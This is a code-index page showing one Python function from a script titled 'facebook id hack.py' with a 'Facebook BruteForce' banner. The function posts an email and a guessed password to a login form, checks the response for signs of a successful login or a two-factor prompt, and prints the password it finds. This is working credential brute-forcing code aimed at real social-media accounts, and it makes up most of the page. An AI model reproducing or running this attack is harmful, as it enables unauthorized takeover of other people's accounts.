MCPcopy Create free account
hub / github.com/geekcomputers/Python / function

Function function

facebook id hack.py:39–50  ·  view source on GitHub ↗
(email, passw, i)

Source from the content-addressed store, hash-verified

37
38
39def function(email, passw, i):
40 global payload, cookie
41 if i % 10 == 1:
42 payload, cookie = create_form()
43 payload["email"] = email
44 payload["pass"] = passw
45 r = requests.post(post_url, data=payload, cookies=cookie, headers=headers)
46 if "Find Friends" in r.text or "Two-factor authentication required" in r.text:
47 open("temp", "w").write(str(r.content))
48 print("\npassword is : ", passw)
49 return True
50 return False
51
52
53print("\n---------- Welcome To Facebook BruteForce ----------\n")

Callers 2

findPasswordFunction · 0.85

Calls 1

create_formFunction · 0.85

Tested by

no test coverage detected